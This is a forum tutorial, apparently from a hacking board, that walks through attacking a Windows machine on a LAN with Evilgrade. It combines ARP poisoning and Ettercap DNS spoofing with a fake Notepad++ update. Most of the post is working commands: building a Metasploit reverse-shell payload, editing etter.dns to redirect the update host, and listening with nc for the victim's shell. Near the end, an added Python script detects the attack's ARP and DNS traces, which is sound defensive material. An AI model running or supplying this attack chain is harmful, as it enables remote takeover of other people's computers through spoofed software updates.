Today I'll explain how to use Evilgrade. Evilgrade is a modular framework that allows an attacker to take advantage of poorly implemented software upgrades. An attacker can use Evilgrade in combination with DNS spoofing or a MITM attack to spoof a software update and trick the victim computer into executing arbitrary code, such as a Metasploit payload. Currently, the Evilgrade framework supports the following software: Java plugin, Winzip, Winamp, MacOS, OpenOffice, iTunes, Linkedin Toolbar, Download Accelerator, notepad++, and speedbit. In this tutorial, I illustrate how to use Evilgrade with a DNS spoofing attack to execute a reverse shell on a target computer.

My target will be my Winblows XP machine using Notepad++ on my own network.

First you will need to download Evilgrade from:
Code:
www.infobyte.com.ar
Once you have downloaded the file, you need to decompress it:
Code:
BT ~ / tar zxvf lsr-evilgrade-1.0.0.tar.gz
OK, so navigate to the folder with:
Code:
BT ~ / cd lsr-evilgrade
Now to start Evilgrade you type:
Code:
./evilgrade
Now that you're in Evilgrade, you can have a look at the modules you could spoof. You can do that by typing:
Code:
show modules
As you can see there are a few you can spoof, but today I'll be using Notepad++.

OK, so you have picked your weapon... err, module. We now have to configure that module. You can do this by typing:
Code:
config notepadplus
NOTE: If you're not using Notepad++, put the name of the module you would like to configure instead.

Now, to see all the options for that module, you type:
Code:
show options
At this point you can see all the options of that module. You can see the virtual host and the agent to inject.

OK, so now we have gotten this far. Have I lost you? Good. The next step is choosing what payload to use with the agent.
You will have to open up a new shell and navigate to the Metasploit directory to see what we can use. You can do that by following the commands below:
Code:
BT ~ / cd /pentest/exploits/framework3
BT ~ / ./msfpayload
Now find what payload you wish to use and remember where it is located.
I will be using windows/shell_reverse_tcp
Now we go back to the Evilgrade shell and set the agent. To set the agent, follow the commands below:
Code:
set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=ip LPORT=port X > <%OUT%>/tmp/a.exe<%OUT%>"]'
NOTE: LHOST is your IP and LPORT is the port you want it to connect to.
What that does is, when the victim installs the update, the payload will connect back to you.

Now the payload and update are all set. The next thing we want to do is DNS spoofing. In order to complete this you need some background knowledge of DNS spoofing.
Now we have to edit the etter.dns file. You can do that by following these commands:
Code:
BT ~ / cd /usr/local/share/ettercap
BT ~ / nano etter.dns
Delete all the entries in the file that won't be used. It should look like this after you are done.
NOTE: Remember I'm using the Notepad++ module; this will be different if you're using another module.
Code:
  GNU nano 2.0.6                         File: etter.dns                                                Modified

#                                                                          #
# or for WINS query:                                                       #
#    workgroup WINS 127.0.0.1                                              #
#    PC*       WINS 127.0.0.1                                              #
#                                                                          #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests      #
#       so if you want to reverse poison you have to specify a plain       #
#       host. (look at the www.microsoft.com example)                      #
#                                                                          #
############################################################################

################################
 notepadplus.sourceforge.net A yourIP
Now we're going to start Ettercap. While still in the shell you edited etter.dns in, type the following:
Code:
ettercap -G
Now that we're in Ettercap we need to:
Sniff (eth0)
Scan for hosts
Set the targets: Default gateway + target pc
Use a MITM attack, ARP poisoning
Go to Plugins and use dns_spoof
Start sniffing

Now open another shell so we can listen on the port that the module will open once the victim has downloaded the "update".
To listen on the port, type the following:
Code:
nc -l -v -p port
NOTE: The port number has to be the port number you set up with the module.

Now go back to Evilgrade and type the following:
Code:
start
Now you have to wait for the victim to accept the update when they open up the program that your module is for. Once they update the program, the shell where you typed the listen command will receive the connection and you will be in their CMD.
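From the defender's side, the procedure above leaves two visible artifacts on the victim LAN: the gateway and the victim suddenly share one MAC address (ARP poisoning), and a public update hostname resolves to a private LAN address (dns_spoof). The following script, which is an added example and not part of the original post or of Evilgrade or Ettercap, flags both from constructed sample data; the `arp -a` lines and DNS answers are made up for illustration.

```python
# Added detection example (not from the original post). Flags the two artifacts
# a DNS-spoofed update attack leaves on a victim network: one MAC answering for
# several IPs (ARP poisoning) and a public update host resolving into private
# address space (dns_spoof). All input below is constructed sample data.
import ipaddress
import re
from collections import defaultdict

# Constructed `arp -a` output (Windows format) as seen on a poisoned host:
# the gateway (.1) and another host (.105) now share the same MAC.
ARP_SAMPLE = """\
  192.168.1.1    00-0c-29-aa-bb-cc   dynamic
  192.168.1.105  00-0c-29-aa-bb-cc   dynamic
  192.168.1.20   00-1b-63-11-22-33   dynamic
"""

# Constructed resolver answers as seen by the update client; the first one
# is the shape a spoofed etter.dns entry produces.
DNS_SAMPLE = """\
notepadplus.sourceforge.net A 192.168.1.105
download.example.org A 93.184.216.34
"""

# Matches both Windows ("ip  mac") and Linux ("? (ip) at mac") arp output.
ARP_RE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\)?\s+(?:at\s+)?"
    r"([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})"
)

def duplicate_macs(arp_text):
    """Return {mac: [ips]} for every MAC bound to more than one IP."""
    seen = defaultdict(list)
    for m in ARP_RE.finditer(arp_text):
        mac = m.group(2).lower().replace(":", "-")   # normalise separators
        seen[mac].append(m.group(1))
    return {mac: ips for mac, ips in seen.items() if len(ips) > 1}

def spoofed_update_hosts(dns_text):
    """Return hostnames whose A record points at private or loopback space.
    Heuristic: an internal update mirror would also trip this, so treat hits
    as something to verify, not proof of an attack."""
    flagged = []
    for line in dns_text.splitlines():
        parts = line.split()
        if len(parts) != 3 or parts[1] != "A":
            continue
        try:
            addr = ipaddress.ip_address(parts[2])
        except ValueError:
            continue
        if addr.is_private or addr.is_loopback:
            flagged.append(parts[0])
    return flagged
```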

I hope this has been of help in any way. If you have any suggestions for what I should add or change, please don't hesitate to send me a PM about it.

Thanks, Jesse.